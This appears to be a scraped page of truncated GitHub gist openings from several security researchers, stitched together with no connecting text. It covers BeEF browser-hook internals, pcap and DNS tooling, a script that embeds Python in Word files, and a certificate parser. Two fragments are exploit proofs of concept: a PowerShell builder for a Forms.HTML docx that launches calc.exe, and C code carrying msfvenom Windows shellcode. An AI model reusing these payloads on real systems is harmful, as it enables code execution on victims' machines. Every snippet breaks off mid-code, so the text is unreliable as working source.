xntrik

Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client

https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM

window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24

Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67

Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503

milo2012

import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time

sunnyc7

Function Trim-WorkingSet {
[cmdletbinding()]
param([int] $procid)

begin {
$sig = @"
[DllImport("kernel32.dll")]
public static extern bool SetProcessWorkingSetSize( IntPtr proc, int min, int max );
"@
}

ismailakkila

from scapy.all import *
import zlib
import uuid
import re
import sys

#Usage Instructions
def usage():
    print("\n")
    print(f"Strip URL Usage (with pcap file): python3 {sys.argv[0]} --inputpcap /path/to/pcap --stripurl /path/to/file")

keyboardcrunch

#!/usr/bin/python3

import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile

def stuffer(py_file, doc_file):

wen-long

dnsmasq的配置文件由/etc/config/dhcp决定 ####禁用 dnsmasq 的 DNS 功能 在该文件 config dnsmasq下添加

option port 54

如果你的 WAN 口是 PPPOE 等方式连接,而且系统日志中有 DHCP packet received on eth0.2 which has no address 就再添加

arbazkiraak

#!/usr/bin/python3

import requests,sys
import urllib3,queue,threading
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}


urls_inp = sys.argv[1]

securifybv

# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'

# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')

securifybv

#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>

// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

hakluke

#!/usr/bin/python3

import ssl,sys,json

cert = ssl.get_server_certificate((sys.argv[1], 443)) #Retrieve SSL server certificate
cert = ssl.PEM_cert_to_DER_cert(cert) #Convert certificate to DER format
begin = cert.rfind(b'\x06\x03\x55\x04\x03') + 7 #Find the last occurence of this byte string indicating the CN, add 7 bytes to startpoint to account for length of byte string and padding
end = begin + cert[begin - 1] #Set endpoint to startpoint + the length of the CN
jsondata = {"ip": sys.argv[1], "cn": cert[begin:end].decode('utf-8')}
print(json.dumps(jsondata))